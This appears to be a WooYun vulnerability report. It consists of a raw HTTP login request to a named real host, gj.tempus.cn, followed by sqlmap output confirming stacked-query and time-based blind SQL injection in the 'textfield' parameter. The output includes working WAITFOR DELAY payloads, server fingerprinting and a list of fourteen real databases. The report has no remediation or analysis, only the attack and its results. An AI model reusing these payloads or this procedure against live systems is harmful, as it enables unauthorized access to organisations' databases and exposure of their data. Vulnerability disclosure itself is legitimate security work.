WooYun.org

POST /default.asp?action=login HTTP/1.1
Host: gj.tempus.cn
Content-Length: 41
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://gj.tempus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://gj.tempus.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDAAAQDSQC=FPNHHAGBKMNMPDFBHGMGLJIA
textfield=admin&textfield2=admin&submit=+

POST parameter 'textfield' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] n
sqlmap identified the following injection points with a total of 134 HTTP(s) req
uests:
---
Place: POST
Parameter: textfield
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: textfield=admin'); WAITFOR DELAY '0:0:5'--&textfield2=admin&submit=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: textfield=admin') WAITFOR DELAY '0:0:5'--&textfield2=admin&submit=
---
[16:34:08] [INFO] testing Microsoft SQL Server
[16:34:08] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[16:34:20] [INFO] confirming Microsoft SQL Server
[16:34:31] [INFO] adjusting time delay to 4 seconds due to good response times
[16:34:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

available databases [14]:
[*] AdvanEmpDb
[*] CobraDGServer
[*] daynitom
[*] master
[*] model
[*] msdb
[*] oanew
[*] Standard_Global
[*] StandardCommonModule
[*] tempdb
[*] tgctour2010
[*] trafax60
[*] veetermsharelog
[*] zytoa